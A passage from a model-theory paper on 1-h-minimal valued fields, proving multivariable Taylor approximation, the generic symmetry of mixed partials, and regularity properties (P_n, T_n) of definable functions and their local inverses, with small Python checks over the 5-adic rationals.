First, recall that \(X\) has a finite partition into \(b\)-definable sets such that for each set \(X^{\prime}\) in the partition there is a coordinate projection \(\pi:X^{\prime}\to K^{r}\) with finite fibers and \(r=\dim(X^{\prime})\), see Fact 2.9. So now assume \(\pi:X\to K^{r}\) is a coordinate projection with finite fibers and \(r=\dim(X)\), and denote \(\pi^{\prime}:X\to K^{n-r}\) the projection into the other coordinates. There is an integer \(s\) which bounds the cardinality of the fibers of \(\pi\). If we denote \(Y_{k}\) the set of elements \(a\in K^{r}\) such that \(X_{a}=\pi^{\prime}(\pi^{-1}(a))\) has cardinality \(k\) then we get \(Y_{0}\cup\dots\cup Y_{s}=K^{r}\). Now let \(V_{j}\subset Y_{j}\) be open dense in the interior of \(Y_{j}\) and such that the map \(V_{j}\to(K^{n-r})^{[j]}\) given by \(a\mapsto X_{a}\) is continuous, see Proposition 2.14. Then the set \(\{x\in X:\pi(x)\in Y_{j}\setminus V_{j},1\leq j\leq s\}\) is of lower dimension than \(X\), by item 2 of Proposition 2.11, and so we may apply the induction hypothesis on it. Recall that a subset \(Y\subset X\) of a topological space \(X\) is locally closed if it is the intersection of an open set and a closed set. This is equivalent to \(Y\) being relatively open in its closure. It is also equivalent to, for every point \(y\in Y\), the existence of a neighborhood \(V\) of \(y\), such that \(Y\cap V\) is relatively closed in \(V\). **Proposition 2.17**.: _Suppose \(K\) is 1-h-minimal and \(X\subset K^{n}\) an \(a\)-definable set. Then \(X\) is a finite union of \(a\)-definable locally closed subsets of \(K^{n}\)._ Proof.: This is a consequence of Proposition 2.15. Namely, there is a partition of \(X\) into a finite union of definable subsets for each of which there is a coordinate projection with finite fibers onto an open set \(U\), so we may assume \(X\) is of this form. We may further assume that the fibers have constant cardinality \(k\) and the associated mapping \(U\to(K^{r})^{[k]}\) is continuous. Then \(X\) is closed in \(U\times K^{r}\) and so locally closed. We finish by reviewing a more difficult property of dimension. We will only use this in Proposition 5.20, Proposition 6.9 and Corollary 6.14, which are not used in the main theorems. **Proposition 2.18**.: _Suppose \(K\) is a 1-h-minimal field and \(X\subset K^{n}\). Then \(\dim(\operatorname{cl}(X)\setminus X)<\dim(X)\)._ This is item 6 of [4, Proposition 5.3.4] for the residue characteristic \(0\) and it is contained in Proposition 3.1.1 of [5] in the mixed characteristic case. ## 3. Taylor approximations In this section we show that, in the \(1\)-h-minimal setting, the generic one variable Taylor approximation theorem ([5, Theorem 3.1.2]) implies a multi-variable version of the theorem. In equicharacteristic \((0,0)\)) this is [4, Theorem 5.6.1]. Though the proof in mixed characteristic is, essentially, similar; we give the details, for the sake of completeness and in view of the importance of this result in the sequel. We then proceed to introducing some regularity conditions for definable functions (implied, in the present context, by Taylor's approximation theorem) necessary for computations related to the Lie algebra of definable groups. First, we recall the multi-index notation. If \(i=(i_{1},\ldots,i_{n})\in\mathbb{N}^{n}\), we denote \(|i|=i_{1}+\cdots+i_{n}\) and \(i!=i_{1}!\cdots i_{n}!\). For \(x=(x_{1},\cdots,x_{n})\in K^{n}\) we denote \(x^{i}=x_{1}^{i_{1}}\cdots x_{n}^{i_{n}}\). 
Also if \(f:U\to K\) is a function defined in an open set of \(K^{n}\), we denote \(f^{(i)}(x)=(\frac{\partial^{i_{1}}}{\partial x_{1}^{i_{1}}}\cdots\frac{ \partial^{i_{n}}}{\partial x_{n}^{i_{n}}}f)(x)\) whenever it exists. Note that we are not assuming equality of mixed derivatives, but see Corollary 3.6. **Proposition 3.1**.: _Let \(K\) be a 1-h-minimal field of residue characteristic \(0\). Suppose \(f:U\to K\) is an \(a\)-definable function with \(U\subset K^{n}\) open and let \(r\in\mathbb{N}\). Then there is an \(a\)-definable set \(C\), of dimension strictly smaller than \(n\), such that for any open ball, \(B\subseteq U\) disjoint from \(C\) the derivative \(f^{(i)}\) exists in \(B\) for every \(i\) with \(|i|\leq r\), and has constant valuation in \(B\). Moreover,_ \[\left|f(x)-\sum_{\{i:|i|<r\}}\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right| \leq\max_{\{i:|i|=r\}}\left|\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right|\] _For every \(x,x_{0}\in B\)._ This is [4, Theorem 5.6.1]. Our first order of business is to generalize this result to positive residue characteristic. The following fact is proved by a standard compactness argument, and is often applied implicitly. We add this argument for convenience. **Fact 3.2**.: _Let \(M\) be an \(\aleph_{0}\)-saturated structure, and \(\{\Phi^{l}(\bar{D})\}_{l\in I}\) be a family of properties of definable sets \(\bar{D}=(D_{1},\ldots,D_{n})\) in \(M\), indexed by a directed set \(I\). Let \(b\) be a tuple in \(M\), and \(S\) be a \(b\)-definable set. Assume that_ 1. _For all_ \(l\) _the property_ \(\Phi^{l}\) _is definable in definable families. I.e, if_ \(\{D_{i,a}\}_{a\in T}\) _are_ \(b\)_-definable families, then the set_ \(\{a\in T:\Phi^{l}(\bar{D}_{a})\text{ holds}\}\) _is_ \(b\)_-definable._ 2. \(\Phi^{l}\) _implies_ \(\Phi^{l^{\prime}}\) _for all_ \(l\leq l^{\prime}\)_._ 3. _For every_ \(a\in S\)_, there are_ \(ba\)_-definable sets_ \(D_{i,a}\)_, satisfying_ \(\Phi^{l_{a}}\) _for some_ \(l_{a}\in I\)_._ _Then there are \(\{D_{i,a}\}_{a\in S}\)\(b\)-definable families of sets, and a fixed \(l\in I\), such that \(\Phi^{l}(\bar{D}_{a})\) holds for every \(a\in S\)._ **Remark 3.3**.: Formally, \(\Phi^{l}\) is a subset of \[\{(D_{1},\ldots,D_{n}):D_{i}\text{ is a definable set and}\}\] and we say \(\Phi^{l}(D_{1},\ldots,D_{n})\) holds if the tuple \((D_{1},\cdots,D_{n})\) belongs to \(\Phi^{l}\). Note also that the tuple \((D_{1},\ldots,D_{n})\) can be replaced with \(D_{1}\times\cdots\times D_{n}\), so there is no loss of generality in taking \(\Phi^{l}\) of the form \(\Phi^{l}(D)\). Proof.: Let \(a\in S\). By hypothesis there are \(b\)-definable families \(\{D^{a}_{i,a^{\prime}}\}_{a^{\prime}\in S^{0,a}_{i}}\) and an element \(l^{a}\in I\), such that \((D^{a}_{1,a},\ldots,D^{a}_{n,a})\) satisfies \(\Phi^{l^{a}}\). Consider \(S^{a}\) to be the set of \(a^{\prime}\in S\) such that \(a^{\prime}\in S^{0,a}_{i}\) for \(i=1,\ldots,n\), and such that \(\Phi^{l^{a}}(\bar{D}^{a}_{a^{\prime}})\) holds. By hypothesis, this is a \(b\)-definable set contained in \(S\) and containing \(a\). We conclude that \(S=\bigcup_{a\in S}S^{a}\) is a cover of \(S\) by \(b\)-definable sets, and so by compactness and saturation there is a finite sub-cover, say \(S=S^{1}\cup\cdots\cup S^{k}\) for \(S^{r}=S^{a_{r}}\). Indeed, if there was no finite sub-cover, then the partial type expressing \(x\in S\) and \(x\notin S^{a}\) for all \(a\in S\), is a consistent \(b\)-type, and so a realization in \(M\) would contradict \(S=\bigcup_{a\in S}S^{a}\). 
Then \(D_{i,a}\) defined as \(D^{a_{r}}_{i,a}\) if \(a\in S^{r}\setminus\bigcup_{r^{\prime}<r}S^{r^{\prime}}\) satisfy that \(\{D_{i,a}\}_{a\in S}\) form \(b\)-definable families. If we take \(l\) such that \(l\geq l^{a_{1}},\ldots,l^{a_{k}}\), then we get that \(\Phi^{l}(\bar{D}_{a})\) holds for every \(a\in S\), as required. **Notation 3.4**.: If \(D\subset E\times F\), and \(a\in E\) we often denote \(D_{a}=\{b\in F:(a,b)\in D\}\). If \(b\in F\) we denote, when no ambiguity can occur, \(D_{b}=\{a\in E:(a,b)\in D\}\). If \(f:D\to C\) is a function, we let \(f_{a}:D_{a}\to C\) denote the function \(f_{a}(b)=f(a,b)\), and similarly \(f_{b}\) for \(b\in F\). **Proposition 3.5**.: _Let \(K\) be a 1-h-minimal field of positive residue characteristic, \(f:U\to K\) an \(a\)-definable function with \(U\subset K^{n}\) open, and let \(r\in\mathbb{N}\). Then there is an integer \(m\), and a set \(C\), closed, \(a\)-definable with \(\dim(C)<n\), such that for every open ball, \(B\subseteq U\)\(m\)-next to \(C\), \(f^{(i)}\) exists in \(B\) for every \(i\) with \(|i|\leq r\), and \(f^{(i)}\) has constant valuation in \(B\). Moreover,_ \[\left|f(x)-\sum_{\{i:|i|<r\}}\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right|\leq \max_{\{i:|i|=r\}}\left|\frac{1}{i!}f^{(i)}(x_{0})(x-x_{0})^{i}\right|\] _For every \(x,x_{0}\in B\)._ Proof.: We proceed by induction on \(n\), the case \(n=1\) being [5, Theorem 3.1.2]. Assume the result for \(n\) and let \(f:U\to K\) be an \(a\)-definable function with \(U\subset K^{n}\times K\) open, \(i\) a multi-index with \(|i|\leq r\). Then for every \(x\in K^{n}\) there is a finite \(ax\)-definable set \(C_{x}\subset K\) and an integer \(m_{x}\) such that \[|f_{x}(y)-\sum_{s<r}\frac{1}{s!}f_{x}^{(s)}(y_{0})(y-y_{0})^{s}|\leq|\frac{1}{r!}f _{x}^{(r)}(y_{0})(y-y_{0})^{r}| \tag{1}\] for every \(y\) and \(y_{0}\) in an open ball \(m_{x}\)-next to \(C_{x}\), and such that \(|f_{x}^{(s)}(y)|\) exists and is constant in any such open ball. By a standard compactness argument (See Fact 3.2), we may assume that the \(C_{x}\) are uniformly definable and that there is some \(m\in\mathbb{N}\) such that \(m_{x}=m\) for all \(x\). Define \(C=\cup_{x}\{x\}\times C_{x}\). By induction, for each \(y\in K\) we can approximate the functions \(g_{s,y}(x)=f_{x}^{(s)}(y)\) defined on \(V_{y}=\operatorname{Int}(U_{y}\setminus C_{y})\) up to order \(r-s\). By the same compactness argument we obtain a natural number \(m^{\prime}\) and an \(a\)-definable family \(\{D_{y}\}_{y\in K^{n}}\) of subsets \(D_{y}\subseteq V_{y}\) with \(\dim(D_{y})<n\) such that \(g_{s,y}^{(i)}\) exists and has constant valuation on any ball \(m^{\prime}\)-next to \(D_{y}\) in \(V_{y}\), for every multi-index, \(i\), with \(|i|\leq r-s\). Moreover, \[|g_{s,y}(x)-\sum_{\{i:|i|<r-s\}}\frac{1}{i!}g_{s,y}^{(i)}(x_{0})(x-x_{0})^{i} |\leq\max_{\{i:|i|=r-s\}}|\frac{1}{i!}g_{s,y}^{(i)}(x_{0})(x-x_{0})^{i}| \tag{2}\] Replacing \(m\) and \(m^{\prime}\) by their maximum, we may assume \(m=m^{\prime}\). Define \(D:=\bigcup_{y}D_{y}\times\{y\}\). By additivity of dimension \(\dim(C)\leq n\) and \(\dim(D)\leq n\). Finally, take \(E=C\cup D\cup\bigcup_{y}(U_{y}\setminus V_{y})\times\{y\}\). Similar dimension considerations show that \(\dim(E)<n+1\). Note that for \((x,y)\in U\setminus E\) we have that, for \(i\) and \(s\) such that \(|i|+s\leq r\), \(f^{(i,s)}(x,y)\) and \(g_{s,y}^{(i)}(x)\) exist and are equal. 
Now, for \(x\in K^{n}\) define \(W_{x}=\operatorname{Int}(U_{x}\setminus E_{x})\), and for the functions \(h_{x,s,i}:y\mapsto f^{(i,s)}(x,y)\) with \(s+|i|\leq r\) defined on \(W_{x}\), we find a finite set \(F_{x}\subset W_{x}\) such that \(\{F_{x}\}_{x}\) is an \(a\)-definable family, and there is an integer \(m^{\prime}\), such that in every ball in \(W_{x}\)\(m^{\prime}\)-next to \(F_{x}\), \(h_{x,s,i}\) has constant valuation. We may assume that \(m^{\prime}=m\) as before. Let \(G\) be the closure of \(E\cup\bigcup_{x}\{x\}\times F_{x}\cup\bigcup_{x}\{x\}\times(U_{x}\setminus W_{ x})\). Note that \(\dim(G)<n+1\). Take \(B_{1}\times B_{2}\) a ball in \(U\), \(m\)-next to \(G\). Then for every \(x\in B_{1}\) we get that \(B_{2}\) is \(m\)-next to both \(C_{x}\) and \(F_{x}\) and \(B_{2}\subseteq W_{x}\). Similarly, for every \(y\in B_{2}\), \(B_{1}\subseteq V_{y}\) is \(m\)-next to \(D_{y}\). We conclude that for every \((x,y)\in B_{1}\times B_{2}\), \(f^{(i,s)}(x,y)\) exists and has constant valuation, for every index \((i,s)\) such that \(|(i,s)|\leq r\). Indeed, we have for every \((x,y),(x^{\prime},y^{\prime})\in B_{1}\times B_{2}\) that \[|f^{(i,s)}(x^{\prime},y^{\prime})|=|g_{s,y^{\prime}}^{(i)}(x^{\prime})|=|g_{s, y^{\prime}}^{(i)}(x)|=|h_{x,s,i}(y^{\prime})|=|h_{x,s,i}(y)|=|f^{(i,s)}(x,y)|,\] as the second equality follows from the condition on \(C_{x}\), and the fourth from those on \(F_{x}\) and \(W_{x}\). Now, if \((x,y)\) and \((x_{0},y_{0})\) are in \(B_{1}\times B_{2}\), then equations 1 and 2 hold and for the error term of 1 we have \(|f_{x}^{(r)}(y_{0})|=|f^{(0,r)}(x,y_{0})|=|f^{(0,r)}(x_{0},y_{0})|\). Denote \[M=\max\left\{\frac{1}{i!s!}|f^{(i,s)}(x_{0},y_{0})(x-x_{0})^{i}(y-y_{0})^{s}|: |(i,s)|=r\right\}.\] Then Equation 1 yields \(|f(x,y)-\sum_{s<r}\frac{1}{s!}f^{(0,s)}(x,y_{0})(y-y_{0})^{s}|\leq M\). Also from Equation 2 we have that \[\left|\frac{1}{s!}f^{(0,s)}(x,y_{0})(y-y_{0})^{s}-\sum_{\{i:|i|<r-s\}}\frac{1}{i! s!}f^{(i,s)}(x_{0},y_{0})(x-x_{0})^{i}(y-y_{0})^{s}\right|\leq M.\] Taking the sum over \(s\) smaller than \(r\) and using the ultrametric inequality we obtain \[\left|\sum_{s}\frac{1}{s!}f^{(0,s)}(x,y_{0})(y-y_{0})^{s}-\sum_{\{(i,s):|i|+s<r \}}\frac{1}{i!s!}f^{(i,s)}(x_{0},y_{0})(x-x_{0})^{i}(y-y_{0})^{s}\right|\leq M.\] Summing this with Equation 1 and using the ultrametric inequality once more we conclude. As a consequence of the previous theorem we obtain that partial derivatives of definable functions commute generically. **Corollary 3.6**.: _Suppose \(f:U\to K\) is a definable function for some open \(U\subset K\times K\). Then there exists a open dense \(U^{\prime}\subset U\) such that for every \((x,y)\in U^{\prime}\)_ \[\frac{\partial}{\partial x}\frac{\partial}{\partial y}f(x,y)=\frac{\partial} {\partial y}\frac{\partial}{\partial x}f(x,y)\] _and, in particular, the terms of the above equation exist in \(U^{\prime}\)._ _Moreover, if \(f:U\to K\) is such that the partial derivatives \(\frac{\partial}{\partial x}\frac{\partial}{\partial y}f(x,y)\), \(\frac{\partial}{\partial y}\frac{\partial}{\partial x}f(x,y)\) exist and are continuous in \(U\), then they are equal._ Proof.: Take a \(1\)-dimensional closed \(C\subset K\times K\) and \(m\) an integer as provided by the Taylor approximation property for errors of order \(3\). We may also assume that \(\pi(C)\) and \(m\) satisfy the same Taylor approximation property for the function \(f\pi\), where \(\pi\) is the coordinate permutation \((x,y)\mapsto(y,x)\). 
Then for \((x,y),(x_{0},y_{0})\in B_{1}\times B_{2}\) in a ball \(m\)-next to \(C\) we obtain (see Definition 2.1 for the big-\(O\) notation) that \[f(x,y)= f(x_{0},y_{0})+(x-x_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial x^{2}}f(x_{0},y_{0})+(y-y_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial y^{2}}f(x_{0},y_{0})+\] \[(x-x_{0})(y-y_{0})\frac{\partial}{\partial x}\frac{\partial}{ \partial y}f(x_{0},y_{0})+O((x-x_{0},y-y_{0})^{3}).\] Similarly, \[f\pi(y,x)=f(x,y)= f(x_{0},y_{0})+(x-x_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial x^{2}}f(x_{0},y_{0})+(y-y_{0})^{2}\frac{1}{2}\frac{\partial^{2}}{ \partial y^{2}}f(x_{0},y_{0})+\] \[(x-x_{0})(y-y_{0})\frac{\partial}{\partial y}\frac{\partial}{ \partial x}f(x_{0},y_{0})+O((x-x_{0},y-y_{0})^{3})\] Taking the difference we obtain \[(x-x_{0})(y-y_{0})\frac{\partial}{\partial y}\frac{\partial}{ \partial x}f(x_{0},y_{0})-(x-x_{0})(y-y_{0})\frac{\partial}{\partial x}\frac{ \partial}{\partial y}f(x_{0},y_{0})=O((x-x_{0},y-y_{0})^{3})\] Taking \(h=(x-x_{0})=(y-y_{0})\) small we get, \(h^{2}(\frac{\partial}{\partial y}\frac{\partial}{\partial x}f(x_{0},y_{0})-\frac {\partial}{\partial x}\frac{\partial}{\partial y}f(x_{0},y_{0}))=O(h^{3})\), so \(\frac{\partial}{\partial y}\frac{\partial}{\partial x}f(x_{0},y_{0})-\frac{ \partial}{\partial x}\frac{\partial}{\partial y}f(x_{0},y_{0})=O(h)\). This is only possible when the left-hand side is \(0\), as desired. The following notation is intended to look similar to the monomial \(ax^{n}\) for \(a\in K\) and \(x\in K\), for the purpose of expressing the Taylor approximation of a multivariate function. **Definition 3.7**.: Let \(m,n\) be positive integers, and \(r\in\mathbb{N}\). Let \(J=J(r,n)=\{j\in\mathbb{N}^{n}:|j|=r\}\). Let \(a=(a_{j})_{j\in J}\) be such that \(a_{j}\in K^{m}\) for all \(j\in J\). Then, for \(x\in K^{n}\) we define \(ax^{r}=\sum\limits_{j\in J}a_{j}x^{j}\), where \(x^{j}:=\prod_{i=1}^{n}x^{j(i)}\). Note that \(x\mapsto ax^{r}\) is a function \(K^{n}\to K^{m}\). As an example, consider, in the above notation, the case \(r=1\). In this case \(J=\{e_{1},\ldots,e_{n}\}\) and for \(j\in J\) we have \(x^{j}=x_{j}\) (where \(x=(x_{1},\ldots,x_{n})\)), so for \(a=(a_{j})_{j\in J}\) with \(a_{j}\in K^{m}\) we get that \(ax=A\cdot x\) where \(A\) is the matrix whose \(j\)-th column is \(a_{j}\). **Definition 3.8**.: Let \(U\subset K^{k}\) be open, \(f:U\to K^{m}\) a function and \(a\in U\). We say that \(f\) is \(P_{n}\) at \(a\) if it is approximable by polynomials of degree \(n\) near \(a\) in the following sense: there are constants \(b_{0},\cdots,b_{n}\)\(f(a+x)=\sum_{r\leq n}b_{r}x^{r}+O(x^{n+1})\). In view of the above example, it follows immediately from the definition that a \(P_{1}\) function is differentiable and for the coefficient \(b_{1}\) in the definition we may take \(f^{\prime}(a)\) (or, more precisely \(b_{1}^{t}=f^{\prime}(a)\)). It follows from Lemma 3.10 below, that - in fact - \(b_{1}=f^{\prime}(a)^{t}\) whenever \(f\) is \(P_{n}\) for any \(n\geq 1\). **Definition 3.9**.: Let \(U\subset K^{k}\) be open, \(f:U\to K^{m}\) a function and \(a\in U\). We say \(f\) is \(T_{n}\) at \(a\) if there is \(\gamma\in\Gamma\) such that for every \(x,x^{\prime}\) with \(|x-a|,|x^{\prime}-a|<\gamma\), we have \(f(x)=\sum_{r\leq n}c_{r}(x^{\prime})(x-x^{\prime})^{r}+O(x-x^{\prime})^{n+1}\) for \(c_{r}\) a \(P_{n-r}\) function at \(a\). 
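As a concrete sanity check of Definition 3.8, the following Python sketch (again over \(\mathbb{Q}\) with the \(5\)-adic absolute value, with a function and sample points chosen by us purely for illustration) verifies the one-variable \(P_{n}\) bound for \(f(y)=1/(1-y)\) at \(0\): its Taylor coefficients are \(b_{r}=1\), and \(f(x)-\sum_{r\leq n}x^{r}=x^{n+1}/(1-x)\), so for \(|x|<1\) the ultrametric inequality gives \(|1-x|=1\) and the error is exactly \(|x|^{n+1}\), i.e. the constant implicit in \(O(x^{n+1})\) can be taken to be \(1\).

```python
from fractions import Fraction

P = 5
def absp(x) -> Fraction:
    """5-adic absolute value on Q (same helper as in the earlier sketch)."""
    x = Fraction(x)
    if x == 0:
        return Fraction(0)
    v, num, den = 0, x.numerator, x.denominator
    while num % P == 0:
        num //= P
        v += 1
    while den % P == 0:
        den //= P
        v -= 1
    return Fraction(1, P) ** v

def f(y: Fraction) -> Fraction:
    return Fraction(1) / (1 - y)          # defined for |y| < 1, in particular y != 1

n = 3
for x in [Fraction(5), Fraction(25, 7), Fraction(5, 3), Fraction(125, 4)]:
    taylor = sum(x**r for r in range(n + 1))         # b_r = 1 for r = 0, ..., n
    error = absp(f(x) - taylor)
    assert error <= absp(x) ** (n + 1), (x, error)   # the P_n bound with constant 1
print("|f(x) - sum_{r<=n} x^r| <= |x|^{n+1} on all sampled points")
```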
Note that in the previous definition, the constant implicit in the notation \(O(x-x^{\prime})^{n+1}\) (see Definition 2.1) does not depend on \(x^{\prime}\); so this definition requires some uniformity with respect to the center \(x^{\prime}\) which is not implied by simply assuming \(f\) is \(P_{n}\) at every point of a ball around \(a\). Note also that if \(f\) is \(T_{n}\) at \(c=(b,a)\) then, in particular \(f(z,a+x)=f(z)+f_{1}(z)x+\cdots+f_{n}(z)x^{n}+O(x^{n+1})\), for \(P_{n-k}\) functions \(f_{k}\) at \(b\) (and a constant in \(O(x^{n+1})\) uniform in \(z\)). This follows from the definition by taking \(x=(z,a+x)\) and \(x^{\prime}=(z,a)\). Sums and products of \(P_{n}\) (resp. \(T_{n}\)) functions are \(P_{n}\) (resp. \(T_{n}\)), and a vector function is \(P_{n}\) (resp. \(T_{n}\)) if and only if its coordinate functions are \(P_{n}\) (resp. \(T_{n}\)). We could also require the stronger condition, \(ST_{n}\), defined similarly to \(T_{n}\), but requiring inductively that the functions \(c_{r}\) be \(ST_{n-r}\) for \(r=1,\ldots,n\) (the base case \(ST_{0}=T_{0}\)). This definition may be more natural, and one can prove the same results for this notion in what follows, but the stated definition is enough for Lemma 3.15, which is our main motivation. **Lemma 3.10**.: _If \(f\) is \(P_{n}\) at \(a\), then for every number \(i\leq n\), the coefficients \(b_{i}\) in Definition 3.8 are determined by \(f\)._ Proof.: The problem readily reduces to the case of \(f\) a polynomial restricted to some open neighborhood, \(U\), of the origin. I.e., we have to show that if \(\sum_{i\leq n}b_{i}x^{i}=O(x^{n+1})\) in any open \(U\subseteq K^{r}\) then \(b_{i}=0\) for all \(i\). For \(x_{0}\) fixed let \(x=tx_{0}\) and consider the single variable polynomial \(P(tx_{0})=\sum_{i\leq n}(b_{i}x_{0}^{i})t^{i}=O(t^{n+1})\). If we knew the result for \(r=1\) this would give that \(b_{i}x_{0}^{i}=0\). Since \(x_{0}\in U\) was arbitrary and \(U\) contains a cartesian product of \(r\) infinite sets, this implies \(b_{i}=0\) for all \(i\). So we are reduced to proving the result for \(r=1\). In this case, if \(i\) is the smallest with \(b_{i}\neq 0\) we get \(x^{i}=O(x^{i+1})\), which is a contradiction. **Proposition 3.11**.: _If \(g\) is \(P_{n}\) at \(a\) and \(f\) is \(P_{n}\) at \(g(a)\) then the composition, \(f\circ g\), is \(P_{n}\) at \(a\)._ _If \(g\) is \(T_{n}\) at \(a\) and \(f\) is \(T_{n}\) at \(g(a)\) then \(f\circ g\) is \(T_{n}\) at \(a\)._ Proof.: For the first statement we write \[f(g(a+x))=\] \[f(g(a)+g_{1}(a)x+...+g_{n}(a)x^{n}+O(x^{n+1}))=\] \[f(g(a))+f_{1}(g(a))h(a,x)+f_{2}(g(a))h(a,x)^{2}+...+O(h(a,x)^{n+1})=\] \[fg(a)+b_{1}(a)x+\cdots+b_{n}(a)x^{n}+O(x^{n+1})+O(h(a,x)^{n+1}),\] where 1. \(h(a,x)=g(a+x)-g(a)=g_{1}(a)x+\cdots+g_{n}(a)x^{n}+O(x^{n+1})\) 2. The second equality is an application of the assumption that \(f\) is \(P_{n}\) at \(g(a)\). 3. The coefficients \(b_{i}\) arise by expanding the expression \[f_{k}(g(a))h(a,x)^{k}=f_{k}(g(a))(g_{1}(a)x+\cdots+g_{n}(a)x^{n}+O(x^{n+1}))^{k}.\] To conclude, we note that, as in the proof of Lemma 3.10, \(h(a,x)=O(x)\), and so \(O(h(a,x)^{n+1})=O(x^{n+1})\).
The proof of the second statement is, essentially, similar: \[f(g(x))=\] \[f(g(x^{\prime})+g_{1}(x^{\prime})(x-x^{\prime})+...+g_{n}(x^{ \prime})(x-x^{\prime})^{n}+O(x-x^{\prime})^{n+1})=\] \[f(g(x^{\prime}))+f_{1}(g(x^{\prime}))h(x,x^{\prime})+f_{2}(g(x^ {\prime}))h(x,x^{\prime})^{2}+...+f_{n}(g(x^{\prime}))(x-x^{\prime})^{n}+O(h(x,x^{\prime})^{n+1})=\] \[f(g(x^{\prime}))+b_{1}(x^{\prime})(x-x^{\prime})+\cdots+b_{n}(x ^{\prime})(x-x^{\prime})^{n}+O(x^{n+1})+O(h(x,x^{\prime})^{n+1})\] Where \(h(x,x^{\prime})=g(x)-g(x^{\prime})=g_{1}(x^{\prime})(x-x^{\prime})+\cdots+g_{ n}(x^{\prime})(x-x^{\prime})^{n}+O(x-x^{\prime})^{n+1}=O(x-x^{\prime})\), and the coordinates of the coefficients \(b_{k}(x^{\prime})\) are sums and products of the coordinates of the coefficients of \(f_{i}(g(x^{\prime}))\) and \(g_{j}(x^{\prime})\) with \(i,j\leq k\). By what we have just proved, those are \(P_{n-i}\) functions. The constant appearing on \(h(x,x^{\prime})=O(x-x^{\prime})\) does not depend on \(x^{\prime}\) because the \(g_{i}\) are continuous at \(a\). We conclude that the \(b_{k}\) are \(P_{n-k}\) at \(a\), as claimed. **Proposition 3.12**.: _Let \(K\) be 1-h-minimal and \(f:U\to K^{m}\) as definable function. Then there exists \(U^{\prime}\subset U\) definable open and dense such that \(f\) is \(T_{n}\) at every point of \(U^{\prime}\)._ _In particular for every \(f:U\to K^{m}\), there is a definable open dense subset \(U^{\prime}\subset U\) such that \(f\) is strictly differentiable in \(U^{\prime}\)._ This follows from Taylor's approximation theorem (Proposition 3.1 in residue characteristic 0 and Proposition 3.5 in positive residue characteristic). The second statement follows because a \(T_{1}\) function is strictly differentiable. In the next section we show that a strictly differentiable map with invertible derivative, definable in a 1-h-minimal valued field, is a local homeomorphism. Here we show that the local inverse is strictly differentiable. We then proceed to showing that the properties \(P_{n}\) and \(T_{n}\) are also preserved in this local inverse, though this latter fact is not used for the proof of our main results. **Proposition 3.13**.: _Suppose \(f:U\to V\) is a bijection where \(U\subset K^{n}\) and \(V\subset K^{n}\) are open. Suppose \(f\) satisfies \(|f(x)-f(y)-(x-y)|<|x-y|\) for \(x,y\in U\) distinct. Assume \(f\) is differentiable at \(a\). Then \(f^{\prime}(a)\) is invertible, \(f^{-1}\) is differentiable at \(b=f(a)\) and \((f^{-1})^{\prime}(b)=f^{\prime}(f^{-1}(b))^{-1}\)._ _If \(f\) is strictly differentiable at \(a\), then \(f^{-1}\) is strictly differentiable at \(b\)._ Proof.: Note that the hypothesis implies \(|f(x)-f(x^{\prime})|=|x-x^{\prime}|\). This implies that \(f^{\prime}(a)\) is invertible. Indeed, assume otherwise, and take \(x\) close to \(a\) such that \(f^{\prime}(a)(x-a)=0\), to get \(|f(x)-f(a)|<|x-a|\), a contradiction. Assume that \(f\) is strictly differentiable at \(a\). Take \(\epsilon>0\) in \(\Gamma\). Then there is \(0<r\in\Gamma\) such that if \(|x-a|,|x^{\prime}-a|<r\), then \(|f(x)-f(x^{\prime})-f^{\prime}(a)(x-x^{\prime})|\leq\epsilon|x-x^{\prime}|\). 
If we denote \(y=f(x)\) and \(y^{\prime}=f(x^{\prime})\), then we have \(|y-y^{\prime}|=|x-x^{\prime}|\), so multiplying the above inequality by \(f^{\prime}(a)^{-1}\) we obtain \[|f^{-1}(y)-f^{-1}(y^{\prime})-f^{\prime}(a)^{-1}(y-y^{\prime})|=\] \[|f^{\prime}(a)^{-1}(f^{\prime}(a)(x-x^{\prime})-(f(x)-f(x^{\prime})))|\leq\] \[|f^{\prime}(a)^{-1}||f(x)-f(x^{\prime})-f^{\prime}(a)(x-x^{\prime})|\leq\] \[\epsilon|f^{\prime}(a)^{-1}||x-x^{\prime}|=\epsilon|f^{\prime}(a)^{-1}||y-y^{\prime}|,\] where, for a linear map, \(A\), represented by the matrix \((a_{ij})_{i,j}\), we denote \(|A|=\max_{i,j}|a_{ij}|\), and use the ultra-metric inequality to get \(|Ax|\leq|A||x|\), which we apply to obtain the first inequality in the above computation. So we conclude that \(|f^{-1}(y)-f^{-1}(y^{\prime})-f^{\prime}(a)^{-1}(y-y^{\prime})|\leq\epsilon|f^{\prime}(a)^{-1}||y-y^{\prime}|\) for any \(y,y^{\prime}\) such that \(|y-b|=|x-a|<r\) and \(|y^{\prime}-b|=|x^{\prime}-a|<r\). We have, thus, shown that \(f^{-1}\) is strictly differentiable at \(b\) and \((f^{-1})^{\prime}(b)=f^{\prime}(f^{-1}(b))^{-1}\). To show that \(f^{-1}\) is differentiable if \(f\) is, substitute \(x^{\prime}=a\) in the above argument. **Proposition 3.14**.: _Suppose \(f:U\to V\) is a bijection where \(U\subset K^{n}\) and \(V\subset K^{n}\) are open. Suppose \(f\) satisfies \(|f(x)-f(y)-(x-y)|<|x-y|\) for \(x,y\in U\) distinct. Then if \(f\) is \(P_{n}\) (resp. \(T_{n}\)) at \(b\), \(f^{-1}\) is \(P_{n}\) (resp. \(T_{n}\)) at \(f(b)\)._ Proof.: Denote \(a=f(b)\). Note that the hypothesis implies that \(|f(x)-f(y)|=|x-y|\) for all distinct \(x,y\in U\), so the inverse map \(f^{-1}\) is continuous, and in fact satisfies \(|f^{-1}(x)-f^{-1}(y)|=|x-y|\) for distinct \(x,y\in V\). In particular, \(f^{-1}\) is \(T_{0}\) in \(V\). Now, assume that \(f\) is \(P_{n}\) at \(b\), with \(n\geq 1\). In particular, by Proposition 3.13 it is differentiable and \(f^{\prime}(b)\) is invertible. Apply the fact that \(f\) is \(P_{n}\) (and see also the discussion following the definition) to get: \[f(y)-f(b)=f^{\prime}(b)(y-b)+f_{2}(b)(y-b)^{2}+\cdots+f_{n}(b)(y-b)^{n}+O(y-b)^{n+1}.\] Rearranging, we get: 